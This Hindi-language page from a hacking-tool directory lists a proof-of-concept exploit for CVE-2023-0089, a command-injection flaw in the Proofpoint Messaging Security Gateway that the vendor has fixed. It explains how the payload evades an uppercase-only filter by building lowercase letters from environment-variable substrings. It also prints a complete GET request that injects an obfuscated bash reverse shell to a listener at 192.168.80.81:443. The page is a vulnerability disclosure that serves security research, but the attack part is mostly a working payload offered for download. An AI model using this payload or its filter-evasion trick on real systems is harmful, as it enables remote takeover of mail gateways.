Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
proofpoint-CVE-2023-0089 — Proofpoint Email Gateway: निम्न-स्तरीय प्रमाणित उपयोगकर्ता से एडमिन RCE | Kitploit
उपकरण/GitHubGitHub/ly1g3/proofpoint-cve-2023-0089
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubly1g3/proofpoint-cve-2023-0089

proofpoint-CVE-2023-0089

Proofpoint Email Gateway: निम्न-स्तरीय प्रमाणित उपयोगकर्ता से एडमिन RCE

रिपॉजिटरी देखें
112 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परिचय

सुरक्षा शोधकर्ता: ly1g3, ly1g3[at]tuta.io

GPG फ़िंगरप्रिंट: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

अवलोकन: रिमोट कोड निष्पादन - निम्न-स्तरीय प्रमाणित उपयोगकर्ता से एडमिन RCE

CVE: CVE-2023-0089

समयरेखा:

  • खोजा गया - ly1g3
  • रिपोर्ट किया गया - ly1g3
  • ठीक किया गया - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Proofpoint Messaging Security Gateway के लिए एक्सप्लॉइट्स

रिमोट कोड निष्पादन (RCE)

Euweb का निम्न-स्तरीय (प्रमाणित) उपयोगकर्ता एडमिन विशेषाधिकारों के साथ मनमाना कोड निष्पादन प्राप्त कर सकता है।

तकनीकी

Euwebutils.pm में getMsgType फ़ंक्शन कमांड इंजेक्शन के लिए संवेदनशील है। $module चर एक get पैरामीटर से आता है और इस उपयोगकर्ता इनपुट पर कोई सैनिटाइज़ेशन लागू नहीं किया जाता है।

root@kitploit:~
sub getMsgType { ... else { $msgtype = eval "Proofpoint::Digest::PROOFPOINT_MAIL_REPORT_MSGTYPE_".uc($module); }

यह getMsgType फ़ंक्शन Euweb एप्लिकेशन द्वारा उपयोग किए जाने वाले कई API कॉल्स में उपयोग किया जाता है, इसलिए एक्सप्लॉइट को कई तरीकों से ट्रिगर किया जा सकता है।

चूँकि सभी अक्षर अपरकेस होने चाहिए, लोअरकेस अक्षरों के लिए इस प्रतिबंध को बायपास करने हेतु एनवायरनमेंट वेरिएबल्स का उपयोग किया जा सकता है। उदाहरण: b के बजाय ${SHELL:1:1}

चूँकि use strict का उपयोग किया जाता है, PROOFPOINT_MAIL_REPORT_MSGTYPE_ को पूरा करने के लिए स्ट्रिंग की शुरुआत में MAIL_GENERAL() जोड़ा जा सकता है। इसके बाद कस्टम perl कोड जोड़ा जा सकता है।

बिना एन्कोड किए गए पेलोड का उदाहरण: MAIL_GENERAL();`id`

POC

लोअरकेस प्रतिबंधों को बायपास करने के लिए एनवायरनमेंट वेरिएबल्स का उपयोग करके रिवर्स शेल एन्कोड किया गया। कोड pps उपयोगकर्ता के रूप में चलाया जाता है।

root@kitploit:~
GET /euweb/euweb?cmd=x_releasemsg&id=0&func=ReleaseMsg&entries=23%3A23%3A12&eid=3&module=MAIL_GENERAL()%3b`/\${SHELL%3a1%3a1}\${SHELL%3a2%3a1}\${LANG%3a1%3a1}/\${USER%3a2%3a1}\${SHELL%3a8%3a1}+-\${SHELL%3a2%3a1}+>%26+/\${SSH_TTY%3a1%3a1}\${TERM%3a2%3a1}\${MAIL%3a1%3a1}/\${TERM%3a1%3a1}\${TERM%3a9%3a1}\${USER%3a0%3a1}/192.168.80.81/443+0>%261
टूल डाउनलोड करें